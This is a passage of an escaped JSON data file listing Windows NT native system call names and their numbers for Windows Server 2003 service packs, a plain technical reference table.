\"NtFlushVirtualMemory\": 154, \"NtFlushWriteBuffer\": 155, \"NtFreeUserPhysicalPages\": 156, \"NtGetContextThread\": 157, \"NtGetCurrentProcessorNumber\": 158, \"NtGetDevicePowerState\": 159, \"NtGetPlugPlayEvent\": 160, \"NtGetWriteWatch\": 161, \"NtImpersonateAnonymousToken\": 162, \"NtImpersonateThread\": 163, \"NtInitializeRegistry\": 164, \"NtInitiatePowerAction\": 165, \"NtIsSystemResumeAutomatic\": 166, \"NtListenPort\": 167, \"NtLoadDriver\": 168, \"NtLoadKey\": 169, \"NtLoadKey2\": 170, \"NtLoadKeyEx\": 171, \"NtLockFile\": 172, \"NtLockProductActivationKeys\": 173, \"NtLockRegistryKey\": 174, \"NtLockVirtualMemory\": 175, \"NtMakePermanentObject\": 176, \"NtMakeTemporaryObject\": 177, \"NtMapUserPhysicalPages\": 178, \"NtModifyBootEntry\": 179, \"NtModifyDriverEntry\": 180, \"NtNotifyChangeDirectoryFile\": 181, \"NtNotifyChangeKey\": 182, \"NtNotifyChangeMultipleKeys\": 183, \"NtOpenEventPair\": 184, \"NtOpenIoCompletion\": 185, \"NtOpenJobObject\": 186, \"NtOpenKeyedEvent\": 187, \"NtOpenMutant\": 188, \"NtOpenObjectAuditAlarm\": 189, \"NtOpenProcessToken\": 190, \"NtOpenSemaphore\": 191, \"NtOpenSymbolicLinkObject\": 192, \"NtOpenThread\": 193, \"NtOpenTimer\": 194, \"NtPlugPlayControl\": 195, \"NtPrivilegeCheck\": 196, \"NtPrivilegeObjectAuditAlarm\": 197, \"NtPrivilegedServiceAuditAlarm\": 198, \"NtPulseEvent\": 199, \"NtQueryBootEntryOrder\": 200, \"NtQueryBootOptions\": 201, \"NtQueryDebugFilterState\": 202, \"NtQueryDirectoryObject\": 203, \"NtQueryDriverEntryOrder\": 204, \"NtQueryEaFile\": 205, \"NtQueryFullAttributesFile\": 206, \"NtQueryInformationAtom\": 207, \"NtQueryInformationJobObject\": 208, \"NtQueryInformationPort\": 209, \"NtQueryInstallUILanguage\": 210, \"NtQueryIntervalProfile\": 211, \"NtQueryIoCompletion\": 212, \"NtQueryMultipleValueKey\": 213, \"NtQueryMutant\": 214, \"NtQueryOpenSubKeys\": 215, \"NtQueryOpenSubKeysEx\": 216, \"NtQueryPortInformationProcess\": 217, \"NtQueryQuotaInformationFile\": 218, \"NtQuerySecurityObject\": 219, \"NtQuerySemaphore\": 220, \"NtQuerySymbolicLinkObject\": 221, \"NtQuerySystemEnvironmentValue\": 222, \"NtQuerySystemEnvironmentValueEx\": 223, \"NtQueryTimerResolution\": 224, \"NtRaiseException\": 225, \"NtRaiseHardError\": 226, \"NtRegisterThreadTerminatePort\": 227, \"NtReleaseKeyedEvent\": 228, \"NtRemoveProcessDebug\": 229, \"NtRenameKey\": 230, \"NtReplaceKey\": 231, \"NtReplyWaitReplyPort\": 232, \"NtRequestDeviceWakeup\": 233, \"NtRequestPort\": 234, \"NtRequestWakeupLatency\": 235, \"NtResetEvent\": 236, \"NtResetWriteWatch\": 237, \"NtRestoreKey\": 238, \"NtResumeProcess\": 239, \"NtSaveKey\": 240, \"NtSaveKeyEx\": 241, \"NtSaveMergedKeys\": 242, \"NtSecureConnectPort\": 243, \"NtSetBootEntryOrder\": 244, \"NtSetBootOptions\": 245, \"NtSetContextThread\": 246, \"NtSetDebugFilterState\": 247, \"NtSetDefaultHardErrorPort\": 248, \"NtSetDefaultLocale\": 249, \"NtSetDefaultUILanguage\": 250, \"NtSetDriverEntryOrder\": 251, \"NtSetEaFile\": 252, \"NtSetHighEventPair\": 253, \"NtSetHighWaitLowEventPair\": 254, \"NtSetInformationDebugObject\": 255, \"NtSetInformationJobObject\": 256, \"NtSetInformationKey\": 257, \"NtSetInformationToken\": 258, \"NtSetIntervalProfile\": 259, \"NtSetIoCompletion\": 260, \"NtSetLdtEntries\": 261, \"NtSetLowEventPair\": 262, \"NtSetLowWaitHighEventPair\": 263, \"NtSetQuotaInformationFile\": 264, \"NtSetSecurityObject\": 265, \"NtSetSystemEnvironmentValue\": 266, \"NtSetSystemEnvironmentValueEx\": 267, \"NtSetSystemInformation\": 268, \"NtSetSystemPowerState\": 269, \"NtSetSystemTime\": 270, \"NtSetThreadExecutionState\": 271, \"NtSetTimerResolution\": 272, \"NtSetUuidSeed\": 273, \"NtSetVolumeInformationFile\": 274, \"NtShutdownSystem\": 275, \"NtSignalAndWaitForSingleObject\": 276, \"NtStartProfile\": 277, \"NtStopProfile\": 278, \"NtSuspendProcess\": 279, \"NtSuspendThread\": 280, \"NtSystemDebugControl\": 281, \"NtTerminateJobObject\": 282, \"NtTestAlert\": 283, \"NtTranslateFilePath\": 284, \"NtUnloadDriver\": 285, \"NtUnloadKey\": 286, \"NtUnloadKey2\": 287, \"NtUnloadKeyEx\": 288, \"NtUnlockFile\": 289, \"NtUnlockVirtualMemory\": 290, \"NtVdmControl\": 291, \"NtWaitForDebugEvent\": 292, \"NtWaitForKeyedEvent\": 293, \"NtWaitHighEventPair\": 294, \"NtWaitLowEventPair\": 295}}, \"Windows Server 2003\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateUserPhysicalPages\": 108, \"NtAllocateUuids\": 109, \"NtAreMappedFilesTheSame\": 110, \"NtAssignProcessToJobObject\": 111, \"NtCancelDeviceWakeupRequest\": 112, \"NtCompactKeys\": 113, \"NtCompareTokens\": 114, \"NtCompleteConnectPort\": 115, \"NtCompressKey\": 116, \"NtConnectPort\": 117, \"NtCreateDebugObject\": 118, \"NtCreateDirectoryObject\": 119, \"NtCreateEventPair\": 120, \"NtCreateIoCompletion\": 121, \"NtCreateJobObject\": 122, \"NtCreateJobSet\": 123, \"NtCreateKeyedEvent\": 124, \"NtCreateMailslotFile\": 125, \"NtCreateMutant\": 126, \"NtCreateNamedPipeFile\": 127, \"NtCreatePagingFile\": 128, \"NtCreatePort\": 129, \"NtCreateProcess\": 130, \"NtCreateProfile\": 131, \"NtCreateSemaphore\": 132, \"NtCreateSymbolicLinkObject\": 133, \"NtCreateTimer\": 134, \"NtCreateToken\": 135, \"NtCreateWaitablePort\": 136, \"NtDebugActiveProcess\": 137, \"NtDebugContinue\": 138, \"NtDeleteAtom\": 139, \"NtDeleteBootEntry\": 140, \"NtDeleteDriverEntry\": 141, \"NtDeleteFile\": 142, \"NtDeleteKey\": 143, \"NtDeleteObjectAuditAlarm\": 144, \"NtDeleteValueKey\": 145, \"NtDisplayString\": 146, \"NtEnumerateBootEntries\": 147, \"NtEnumerateDriverEntries\": 148, \"NtEnumerateSystemEnvironmentValuesEx\": 149, \"NtExtendSection\": 150, \"NtFilterToken\": 151, \"NtFlushInstructionCache\": 152, \"NtFlushKey\": 153, \"NtFlushVirtualMemory\": 154, \"NtFlushWriteBuffer\": 155, \"NtFreeUserPhysicalPages\": 156, \"NtGetContextThread\": 157, \"NtGetCurrentProcessorNumber\": 158, \"NtGetDevicePowerState\": 159, \"NtGetPlugPlayEvent\": 160, \"NtGetWriteWatch\": 161, \"NtImpersonateAnonymousToken\": 162, \"NtImpersonateThread\": 163, \"NtInitializeRegistry\": 164, \"NtInitiatePowerAction\": 165, \"NtIsSystemResumeAutomatic\": 166, \"NtListenPort\": 167, \"NtLoadDriver\": 168, \"NtLoadKey\": 169, \"NtLoadKey2\": 170, \"NtLoadKeyEx\": 171, \"NtLockFile\": 172, \"NtLockProductActivationKeys\": 173, \"NtLockRegistryKey\": 174, \"NtLockVirtualMemory\": 175, \"NtMakePermanentObject\": 176, \"NtMakeTemporaryObject\": 177, \"NtMapUserPhysicalPages\": 178, \"NtModifyBootEntry\": 179, \"NtModifyDriverEntry\": 180, \"NtNotifyChangeDirectoryFile\": 181, \"NtNotifyChangeKey\": 182, \"NtNotifyChangeMultipleKeys\": 183, \"NtOpenEventPair\": 184, \"NtOpenIoCompletion\": 185, \"NtOpenJobObject\": 186, \"NtOpenKeyedEvent\": 187, \"NtOpenMutant\": 188, \"NtOpenObjectAuditAlarm\": 189, \"NtOpenProcessToken\": 190, \"NtOpenSemaphore\": 191, \"NtOpenSymbolicLinkObject\": 192, \"NtOpenThread\": 193, \"NtOpenTimer\": 194, \"NtPlugPlayControl\": 195, \"NtPrivilegeCheck\": 196, \"NtPrivilegeObjectAuditAlarm\": 197, \"NtPrivilegedServiceAuditAlarm\": 198, \"NtPulseEvent\": 199, \"NtQueryBootEntryOrder\": 200, \"NtQueryBootOptions\": 201, \"NtQueryDebugFilterState\": 202, \"NtQueryDirectoryObject\": 203, \"NtQueryDriverEntryOrder\": 204, \"NtQueryEaFile\": 205, \"NtQueryFullAttributesFile\": 206, \"NtQueryInformationAtom\": 207, \"NtQueryInformationJobObject\": 208, \"NtQueryInformationPort\": 209, \"NtQueryInstallUILanguage\": 210, \"NtQueryIntervalProfile\": 211, \"NtQueryIoCompletion\": 212, \"NtQueryMultipleValueKey\": 213, \"NtQueryMutant\": 214, \"NtQueryOpenSubKeys\": 215, \"NtQueryOpenSubKeysEx\": 216, \"NtQueryPortInformationProcess\": 217, \"NtQueryQuotaInformationFile\": 218, \"NtQuerySecurityObject\": 219, \"NtQuerySemaphore\": 220, \"NtQuerySymbolicLinkObject\": 221, \"NtQuerySystemEnvironmentValue\": 222, \"NtQuerySystemEnvironmentValueEx\": 223, \"NtQueryTimerResolution\": 224, \"NtRaiseException\": 225, \"NtRaiseHardError\": 226, \"NtRegisterThreadTerminatePort\": 227, \"NtReleaseKeyedEvent\": 228, \"NtRemoveProcessDebug\": 229, \"NtRenameKey\": 230, \"NtReplaceKey\": 231, \"NtReplyWaitReplyPort\": 232, \"NtRequestDeviceWakeup\": 233, \"NtRequestPort\": 234, \"NtRequestWakeupLatency\": 235, \"NtResetEvent\": 236, \"NtResetWriteWatch\": 237, \"NtRestoreKey\": 238, \"NtResumeProcess\": 239, \"NtSaveKey\": 240, \"NtSaveKeyEx\": 241, \"NtSaveMergedKeys\": 242, \"NtSecureConnectPort\": 243, \"NtSetBootEntryOrder\": 244, \"NtSetBootOptions\": 245, \"NtSetContextThread\": 246, \"NtSetDebugFilterState\": 247, \"NtSetDefaultHardErrorPort\": 248, \"NtSetDefaultLocale\": 249, \"NtSetDefaultUILanguage\": 250, \"NtSetDriverEntryOrder\": 251, \"NtSetEaFile\": 252, \"NtSetHighEventPair\": 253, \"NtSetHighWaitLowEventPair\": 254, \"NtSetInformationDebugObject\": 255, \"NtSetInformationJobObject\": 256, \"NtSetInformationKey\": 257, \"NtSetInformationToken\": 258, \"NtSetIntervalProfile\": 259, \"NtSetIoCompletion\": 260, \"NtSetLdtEntries\": 261, \"NtSetLowEventPair\": 262, \"NtSetLowWaitHighEventPair\": 263, \"NtSetQuotaInformationFile\": 264, \"NtSetSecurityObject\": 265, \"NtSetSystemEnvironmentValue\": 266, \"NtSetSystemEnvironmentValueEx\": 267, \"NtSetSystemInformation\": 268, \"NtSetSystemPowerState\": 269, \"NtSetSystemTime\": 270, \"NtSetThreadExecutionState\": 271, \"NtSetTimerResolution\": 272, \"NtSetUuidSeed\": 273, \"NtSetVolumeInformationFile\": 274, \"NtShutdownSystem\": 275, \"NtSignalAndWaitForSingleObject\": 276, \"NtStartProfile\": 277, \"NtStopProfile\": 278, \"NtSuspendProcess\": 279, \"NtSuspendThread\": 280, \"NtSystemDebugControl\": 281, \"NtTerminateJobObject\": 282, \"NtTestAlert\": 283, \"NtTranslateFilePath\": 284, \"NtUnloadDriver\": 285, \"NtUnloadKey\": 286, \"NtUnloadKey2\": 287, \"NtUnloadKeyEx\": 288, \"NtUnlockFile\": 289, \"NtUnlockVirtualMemory\": 290, \"NtVdmControl\": 291, \"NtWaitForDebugEvent\": 292, \"NtWaitForKeyedEvent\": 293, \"NtWaitHighEventPair\": 294, \"NtWaitLowEventPair\": 295}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateUserPhysicalPages\": 108, \"NtAllocateUuids\": 109, \"NtAreMappedFilesTheSame\": 110, \"NtAssignProcessToJobObject\": 111, \"NtCancelDeviceWakeupRequest\": 112, \"NtCompactKeys\": 113, \"NtCompareTokens\": 114, \"NtCompleteConnectPort\": 115, \"NtCompressKey\": 116, \"NtConnectPort\": 117, \"NtCreateDebugObject\": 118, \"NtCreateDirectoryObject\": 119, \"NtCreateEventPair\": 120, \"NtCreateIoCompletion\": 121, \"NtCreateJobObject\": 122, \"NtCreateJobSet\": 123, \"NtCreateKeyedEvent\": 124, \"NtCreateMailslotFile\": 125, \"NtCreateMutant\": 126, \"NtCreateNamedPipeFile\": 127, \"NtCreatePagingFile\": 128, \"NtCreatePort\": 129, \"NtCreateProcess\": 130, \"NtCreateProfile\": 131, \"NtCreateSemaphore\": 132, \"NtCreateSymbolicLinkObject\": 133, \"NtCreateTimer\": 134, \"NtCreateToken\": 135, \"NtCreateWaitablePort\": 136, \"NtDebugActiveProcess\": 137, \"NtDebugContinue\": 138, \"NtDeleteAtom\": 139, \"NtDeleteBootEntry\": 140, \"NtDeleteDriverEntry\": 141, \"NtDeleteFile\": 142, \"NtDeleteKey\": 143, \"NtDeleteObjectAuditAlarm\": 144, \"NtDeleteValueKey\": 145, \"NtDisplayString\": 146, \"NtEnumerateBootEntries\": 147, \"NtEnumerateDriverEntries\": 148, \"NtEnumerateSystemEnvironmentValuesEx\": 149, \"NtExtendSection\": 150, \"NtFilterToken\": 151, \"NtFlushInstructionCache\": 152, \"NtFlushKey\": 153, \"NtFlushVirtualMemory\": 154, \"NtFlushWriteBuffer\": 155, \"NtFreeUserPhysicalPages\": 156, \"NtGetContextThread\": 157, \"NtGetCurrentProcessorNumber\": 158, \"NtGetDevicePowerState\": 159, \"NtGetPlugPlayEvent\": 160, \"NtGetWriteWatch\": 161, \"NtImpersonateAnonymousToken\": 162, \"NtImpersonateThread\": 163, \"NtInitializeRegistry\": 164, \"NtInitiatePowerAction\": 165, \"NtIsSystemResumeAutomatic\": 166, \"NtListenPort\": 167, \"NtLoadDriver\": 168, \"NtLoadKey\": 169, \"NtLoadKey2\": 170, \"NtLoadKeyEx\": 171, \"NtLockFile\": 172, \"NtLockProductActivationKeys\": 173, \"NtLockRegistryKey\": 174, \"NtLockVirtualMemory\": 175, \"NtMakePermanentObject\": 176, \"NtMakeTemporaryObject\": 177, \"NtMapUserPhysicalPages\": 178, \"NtModifyBootEntry\": 179, \"NtModifyDriverEntry\": 180, \"NtNotifyChangeDirectoryFile\": 181, \"NtNotifyChangeKey\": 182, \"NtNotifyChangeMultipleKeys\": 183, \"NtOpenEventPair\": 184, \"NtOpenIoCompletion\": 185, \"NtOpenJobObject\": 186, \"NtOpenKeyedEvent\": 187, \"NtOpenMutant\": 188, \"NtOpenObjectAuditAlarm\": 189, \"NtOpenProcessToken\": 190, \"NtOpenSemaphore\": 191, \"NtOpenSymbolicLinkObject\": 192, \"NtOpenThread\": 193, \"NtOpenTimer\": 194, \"NtPlugPlayControl\": 195, \"NtPrivilegeCheck\": 196, \"NtPrivilegeObjectAuditAlarm\": 197, \"NtPrivilegedServiceAuditAlarm\": 198, \"NtPulseEvent\": 199, \"NtQueryBootEntryOrder\": 200, \"NtQueryBootOptions\": 201, \"NtQueryDebugFilterState\": 202, \"NtQueryDirectoryObject\": 203, \"NtQueryDriverEntryOrder\": 204, \"NtQueryEaFile\": 205, \"NtQueryFullAttributesFile\": 206, \"NtQueryInformationAtom\": 207, \"NtQueryInformationJobObject\": 208, \"NtQueryInformationPort\": 209, \"NtQueryInstallUILanguage\": 210, \"NtQueryIntervalProfile\": 211, \"NtQueryIoCompletion\": 212, \"NtQueryMultipleValueKey\": 213, \"NtQueryMutant\": 214, \"NtQueryOpenSubKeys\": 215, \"NtQueryOpenSubKeysEx\": 216, \"NtQueryPortInformationProcess\": 217, \"NtQueryQuotaInformationFile\": 218, \"NtQuerySecurityObject\": 219, \"NtQuerySemaphore\": 220, \"NtQuerySymbolicLinkObject\": 221, \"NtQuerySystemEnvironmentValue\": 222, \"NtQuerySystemEnvironmentValueEx\": 223, \"NtQueryTimerResolution\": 224, \"NtRaiseException\": 225, \"NtRaiseHardError\": 226, \"NtRegisterThreadTerminatePort\": 227, \"NtReleaseKeyedEvent\": 228, \"NtRemoveProcessDebug\": 229, \"NtRenameKey\": 230, \"NtReplaceKey\": 231, \"NtReplyWaitReplyPort\": 232, \"NtRequestDeviceWakeup\": 233, \"NtRequestPort\": 234, \"NtRequestWakeupLatency\": 235, \"NtResetEvent\": 236, \"NtResetWriteWatch\": 237, \"NtRestoreKey\": 238, \"NtResumeProcess\": 239, \"NtSaveKey\": 240, \"NtSaveKeyEx\": 241, \"NtSaveMergedKeys\": 242, \"NtSecureConnectPort\": 243, \"NtSetBootEntryOrder\": 244, \"NtSetBootOptions\": 245, \"NtSetContextThread\": 246, \"NtSetDebugFilterState\": 247, \"NtSetDefaultHardErrorPort\": 248, \"NtSetDefaultLocale\": 249, \"NtSetDefaultUILanguage\": 250, \"NtSetDriverEntryOrder\": 251, \"NtSetEaFile\": 252, \"NtSetHighEventPair\": 253, \"NtSetHighWaitLowEventPair\": 254, \"NtSetInformationDebugObject\": 255, \"NtSetInformationJobObject\": 256, \"NtSetInformationKey\": 257, \"NtSetInformationToken\": 258, \"NtSetIntervalProfile\": 259, \"NtSetIoCompletion\": 260, \"NtSetLdtEntries\": 261, \"NtSetLowEventPair\": 262, \"NtSetLowWaitHighEventPair\": 263, \"NtSetQuotaInformationFile\": 264, \"NtSetSecurityObject\": 265, \"NtSetSystemEnvironmentValue\": 266, \"NtSetSystemEnvironmentValueEx\": 267, \"NtSetSystemInformation\": 268, \"NtSetSystemPowerState\": 269, \"NtSetSystemTime\": 270, \"NtSetThreadExecutionState\": 271, \"NtSetTimerResolution\": 272, \"NtSetUuidSeed\": 273, \"NtSetVolumeInformationFile\": 274, \"NtShutdownSystem\": 275, \"NtSignalAndWaitForSingleObject\": 276, \"NtStartProfile\": 277, \"NtStopProfile\": 278, \"NtSuspendProcess\": 279, \"NtSuspendThread\": 280, \"NtSystemDebugControl\": 281, \"NtTerminateJobObject\": 282, \"NtTestAlert\": 283, \"NtTranslateFilePath\": 284, \"NtUnloadDriver\": 285, \"NtUnloadKey\": 286, \"NtUnloadKey2\": 287, \"NtUnloadKeyEx\": 288, \"NtUnlockFile\": 289, \"NtUnlockVirtualMemory\": 290, \"NtVdmControl\": 291, \"NtWaitForDebugEvent\": 292, \"NtWaitForKeyedEvent\": 293, \"NtWaitHighEventPair\": 294, \"NtWaitLowEventPair\": 295}, \"R2\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateUserPhysicalPages\": 108, \"NtAllocateUuids\": 109, \"NtAreMappedFilesTheSame\": 110, \"NtAssignProcessToJobObject\": 111, 